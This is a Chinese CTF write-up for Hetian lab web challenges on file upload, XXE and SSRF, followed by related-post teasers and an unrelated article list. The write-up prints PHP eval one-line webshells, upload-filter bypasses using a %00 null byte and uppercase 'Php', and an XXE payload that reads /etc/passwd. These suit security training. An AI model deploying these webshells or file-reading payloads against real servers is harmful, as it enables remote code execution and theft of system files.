合天网安 在线实验 CTF竞赛 writeup(第七周 | 再见上传、第八周 | 随意的上传、第十三周 | simple xxe、第十五周 | 回显的SSRF)
文章目录
- 第七周 | 再见上传
- 第八周 | 随意的上传
- 第十三周 | simple xxe
- 第十五周 | 回显的SSRF
第七周 | 再见上传
<?php @eval($_POST['g']);?>做一个木马,发现只是上传png格式,但是dir也被post了,可以修改dir来拼接文件名,加上%00阶段(%00需要urldecode)
flag{asdf_hetianlab_com}
第八周 | 随意的上传
<script language="Php">eval($_REQUEST[1])</script>
<?和php都被过滤替换了,php可以大写绕过Php
flag{0123_4567_8901}
第十三周 | simple xxe
可以用file协议读文件
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///etc/passwd">]>
<user><username>&admin;</username><password>123456</password></user>
注释里面有提示
flag{hetianlab_ctf}
第十五周 | 回显的SSRF
File协议读文件
flag{enter_your_passwd}
合天网安 在线实验 CTF竞赛 writeup(第七周 | 再见上传、第八周 | 随意的上传、第十三周 | simple xxe、第十五周 | 回显的SSRF)相关推荐
- 合天网安 在线实验 CTF竞赛 writeup(第六周 | 套娃一样的上传、第二十一周 | 你的空格哪去了、第十周 | 试试协议吧、第十一周 | 签到般的包含、第九周 | 试下phpinfo吧)
文章目录 第六周 | 套娃一样的上传 第二十一周 | 你的空格哪去了 第十周 | 试试协议吧 第十一周 | 签到般的包含 第九周 | 试下phpinfo吧 第六周 | 套娃一样的上传 图片上传题目,看 ...
- 合天网安weekly系列ctf实战 | 第八周 | 随意的上传wp
第八周 | 随意的上传 打开题目 看到题目首先想到的是上传一句话木马用菜刀连接 写入一句话木马上传成功,但有字符被过滤 尝试使用js绕过 上传成功 连接上菜刀,根据提示在/var/www/html目录 ...
- BurpSuite实战——合天网安实验室学习笔记
burpsuite是一款功能强大的用于攻击web应用程序的集成平台,通常在服务器和客户端之间充当一个双向代理,用于截获通信过程中的数据包,对于截获到的包可以人为的进行修改和重放. 此BurpSuite ...
- 合天网安 CTF之第六周-套娃一样的上传
合天网安 CTF之第六周-套娃一样的上传 一.实验目的 本实验无writeup,需要同学们发挥自己所学,拿下最终目标 二.实验环境 目标机:Centos7 IP地址:10.1.1.147:5006 攻 ...
- 合天网安就业班_CTF挑战赛-合天网安实验室
[TOCCTF挑战赛-合天网安实验室逆向解析] CTF挑战赛-合天网安实验室sourl.cn 1.逆向100 修改后缀为.apk 安卓模拟器打开,发现要求输入Password 用Android逆向助 ...
- 合天网安实验室CTF-Steg150-一段欢快的曲调
合天网安实验室CTF-Steg150-一段欢快的曲调 题目描述 滴滴 相关附件 stego100.wav 题目链接 参考解题步骤 1.下载的附件是一段wav格式的音频,打开听了一下,确实是欢快 ...
- 【合天网安】FCKeditor 2.4.3文件上传漏洞
[合天网安实验室]FCKeditor 2.4.3文件上传漏洞 编辑器漏洞 常见的文本编辑器有FCKeditor.Ewebeditor.UEditor.KindEditor.XHeditor等,它们包含 ...
- 合天网安实验室CTF-基础50-0x01
合天网安实验室CTF-基础50-0x01 最近无聊时准备刷点题,由简到难慢慢来吧 题目描述 真的不能再简单了! 相关附件 misc50.zip 题目链接 参考解题步骤 1.下载下来的压缩包解压 ...
- 合天网安实验室CTF-Web100-Give Me Flag
合天网安实验室CTF-Web100-Give Me Flag 题目描述 哎,不小心把代码弄乱惹 相关附件 web100.zip 题目链接 参考解题步骤 1.下载附件打开后是一段JavaScri ...
最新文章
- 当前人工智能技术都在哪些领域有应用
- Unity游戏开发技巧集锦2.1.3实现效果
- 在当当买了python怎么下载源代码-爬虫实战:爬取当当网所有 Python 书籍
- C语言预定义宏 __func__、__FUNCTION__、__LINE__、__FILE__、__DATE__、__TIME__
- 剑与远征英雄兑换码如此少见,新玩家连抽获得数位英雄
- JAVA程序测试时用到的与内存测试有关的东西
- c语言 如何创建adt_编程那些事儿:面向对象编程基石之数据抽象(ADT)
- idiom的学习笔记(一)、三栏布局
- n的阶乘程序python_Python程序对N阶乘的尾随零进行计数
- 实现 npm script 跨平台兼容
- android 进度条图标方形_Android - 条纹进度条实现,调整view宽度仿进度条
- linux 7 打开22端口号,Centos 7 修改 SSH 默认端口号
- pyspark对Mysql数据库进行读写
- NVIDIA 控制面板闪退问题解决
- chrome官网下载win64离线安装包
- 番薯借阅--图书管理系统(小程序)
- Mysql从入门到入魔——6. 表联结、组合查询
- 【高通SDM660平台 Android 10.0】(21) --- 高通Camera persist使用手册
- 以太网物理层信号测试与分析
- The C Programming Language 读书总结